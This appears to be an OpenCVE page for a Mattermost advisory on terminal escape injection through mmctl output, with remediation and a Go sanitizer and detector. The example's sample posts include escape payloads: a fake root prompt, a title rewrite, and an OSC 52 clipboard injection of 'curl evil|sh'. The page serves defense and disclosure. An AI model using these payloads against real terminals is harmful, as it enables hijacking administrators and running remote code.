Description
Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output, which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking. Mattermost Advisory ID: MMSA-2026-00599
Published: 2026-03-26
Score: 8 High
EPSS: < 1% Very Low
KEV: No
Impact: Terminal Manipulation via Escape Sequences
Action: Patch
AI Analysis

Impact

Mattermost Server versions prior to 11.5.0, 11.2.3, 10.11.11, 11.4.1, and 11.3.2 do not escape ANSI and OSC control sequences that users can embed in post content. When mmctl prints that content to an administrator's terminal, for example through the report posts command named in the advisory title, the terminal interprets the embedded sequences. CSI sequences can clear or redraw the screen and paint a fake prompt, and OSC sequences can rewrite the window title or, via OSC 52, write attacker-chosen text into the clipboard.

Affected Systems

The issue affects Mattermost Server 11.2.x up to and including 11.2.2, 10.11.x up to and including 10.11.10, 11.4.x up to and including 11.4.0, and 11.3.x up to and including 11.3.1. Upgrading to 11.5.0, 11.2.3, 10.11.11, 11.4.1, 11.3.2 or newer resolves the problem.

Risk and Exploitability

The CVSS 3.1 base score of 8.0 indicates high severity, while the EPSS score of less than 1% suggests that exploitation is currently infrequent. The vulnerability is not listed in the CISA KEV catalog. The vector (AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H) encodes the preconditions: the attacker needs an account that can post (PR:L), and an administrator must later run an mmctl command whose output includes the crafted post (UI:R). The changed scope reflects that the injected sequences act on the administrator's terminal, a different security authority from the Mattermost server itself.

Generated by OpenCVE AI on March 30, 2026 at 21:50 UTC.

Remediation

Vendor Solution

Update Mattermost to versions 11.5.0, 11.2.3, 10.11.11, 11.4.1, 11.3.2 or higher.


OpenCVE Recommended Actions

  • Upgrade Mattermost Server to a fixed release such as 11.5.0, 11.2.3, 10.11.11, 11.4.1, 11.3.2 or newer.
  • If an upgrade cannot be performed immediately, restrict mmctl post-reporting and post-listing commands to trusted administrators and avoid viewing output that may contain untrusted post content on an interactive terminal. Piping the output through a viewer that renders control characters visibly (for example `cat -v`, or `less` without -r/-R) neutralizes the sequences before they reach the terminal, and redirecting to a file for inspection with such a viewer is safer than reading it live.
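The mechanism described under Impact and the interim mitigation above, as an added example that is not Mattermost's or mmctl's own code and not the project's actual fix: a Go routine that either strips recognised CSI/OSC/DCS sequences from untrusted text or renders them visibly the way `cat -v` does, plus a detection predicate that flags posts carrying any control characters. The post bodies are constructed for illustration, and the names `Neutralize`, `ContainsEscapes` and `sequenceEnd` are this example's own.

```go
// Added example, not Mattermost's or mmctl's code: neutralize terminal control
// sequences in untrusted text before a CLI prints it. Sample posts are constructed.
package main

import (
	"fmt"
	"strings"
	"unicode/utf8"
)

// sequenceEnd returns the index just past the escape sequence whose ESC (0x1b)
// is at s[i]. A bare or unrecognised ESC consumes only itself.
func sequenceEnd(s string, i int) int {
	n := len(s)
	if i+1 >= n {
		return i + 1
	}
	switch s[i+1] {
	case ']', 'P', 'X', '^', '_': // OSC, DCS, SOS, PM, APC: runs to BEL or ST (ESC \)
		for j := i + 2; j < n; j++ {
			if s[j] == 0x07 {
				return j + 1
			}
			if s[j] == 0x1b && j+1 < n && s[j+1] == '\\' {
				return j + 2
			}
		}
		return n // unterminated: a terminal would swallow the rest, so do we
	}
	// CSI (ESC [): bytes 0x20-0x3F then one final byte 0x40-0x7E.
	// Any other ESC x: intermediates 0x20-0x2F then one final byte 0x30-0x7E.
	j, final := i+1, byte(0x30)
	if s[i+1] == '[' {
		j, final = i+2, 0x40
	}
	for j < n && s[j] >= 0x20 && s[j] < final {
		j++
	}
	if j < n && s[j] >= final && s[j] <= 0x7e {
		return j + 1
	}
	return j
}

// Neutralize returns s in a form a terminal will not act on. With strip=true
// recognised ESC-led sequences are removed; otherwise ESC is shown as ^[ (cat -v
// style), which leaves the sequence's printable tail inert. Other C0 controls
// (except \n and \t), DEL, C1 controls (U+0080-U+009F, the 8-bit CSI/OSC) and
// invalid UTF-8 are always rendered visibly.
func Neutralize(s string, strip bool) string {
	var b strings.Builder
	for i := 0; i < len(s); {
		c := s[i]
		switch {
		case c == 0x1b && strip:
			i = sequenceEnd(s, i)
		case (c < 0x20 && c != '\n' && c != '\t') || c == 0x7f:
			b.WriteString("^" + string(rune(c^0x40))) // ESC -> ^[, BEL -> ^G, DEL -> ^?
			i++
		case c >= 0x80:
			r, size := utf8.DecodeRuneInString(s[i:])
			if (r == utf8.RuneError && size == 1) || (r >= 0x80 && r <= 0x9f) {
				fmt.Fprintf(&b, "<%X>", s[i:i+size]) // C1 control or stray byte, as hex
			} else {
				b.WriteString(s[i : i+size])
			}
			i += size
		default:
			b.WriteByte(c)
			i++
		}
	}
	return b.String()
}

// ContainsEscapes is the detection side: true if s carries anything a terminal
// could interpret, usable to flag posts at write time or in an audit log.
func ContainsEscapes(s string) bool {
	for _, r := range s {
		if (r < 0x20 && r != '\n' && r != '\t') || r == 0x7f || (r >= 0x80 && r <= 0x9f) {
			return true
		}
	}
	return false
}

// Constructed attacker posts covering the effects the advisory names.
var samplePosts = []string{
	"\x1b[2J\x1b[H\x1b[32mroot@mattermost\x1b[0m:~# ",     // clear screen, fake root prompt
	"hello \x1b]52;c;Y3VybCBldmlsfHNo\x07 world",          // OSC 52: clipboard <- "curl evil|sh"
	"\x1b]0;All clear, nothing to see here\x1b\\status ok", // OSC 0 with ST: set window title
	"\u009b2Kerased",                                      // 8-bit CSI in UTF-8: erase line
}

func main() {
	for _, p := range samplePosts {
		fmt.Printf("%q\n  flagged : %v\n  visible : %s\n  stripped: %s\n",
			p, ContainsEscapes(p), Neutralize(p, false), Neutralize(p, true))
	}
}
```

The visible mode is what a pipe through `cat -v` gives an administrator today; the strip mode is what a CLI should apply itself before writing any user-controlled field to a tty. Two details matter in practice: an OSC string is terminated by either BEL or ST, so a sanitizer that only looks for BEL leaves the ST form live, and the 8-bit C1 introducers arrive as two UTF-8 bytes, so the loop decodes runes rather than matching single bytes.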

Advisories
Source: GitHub GHSA
ID: GHSA-3439-vqgj-2gcf
Title: Mattermost allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences
References
History

Mon, 30 Mar 2026 20:00:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Mattermost mattermost Server
CPEs                                  cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*
                                      cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*
Vendors & Products                    Mattermost mattermost Server

Fri, 27 Mar 2026 08:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Mattermost
                                      Mattermost mattermost
Vendors & Products                    Mattermost
                                      Mattermost mattermost

Thu, 26 Mar 2026 18:15:00 +0000

Type                 Values Removed   Values Added
Metrics                               ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Thu, 26 Mar 2026 16:45:00 +0000

Type                 Values Removed   Values Added
Description                           Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to sanitize user-controlled post content in the mmctl commands terminal output, which allows attackers to manipulate administrator terminals via crafted messages containing ANSI and OSC escape sequences that enable screen manipulation, fake prompts, and clipboard hijacking. Mattermost Advisory ID: MMSA-2026-00599
Title                                 Terminal Escape Injection in mmctl Report Posts Command
Weaknesses                            CWE-150 (Improper Neutralization of Escape, Meta, or Control Sequences)
References
Metrics                               cvssV3_1: {'score': 8, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: Mattermost

Published:

Updated: 2026-03-27T03:55:41.498Z

Reserved: 2026-02-24T10:50:40.507Z

Link: CVE-2026-3108

Vulnrichment

Updated: 2026-03-26T17:47:48.522Z

NVD

Status : Analyzed

Published: 2026-03-26T17:16:41.797

Modified: 2026-03-30T19:45:27.367

Link: CVE-2026-3108

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-31T20:08:56Z

Weaknesses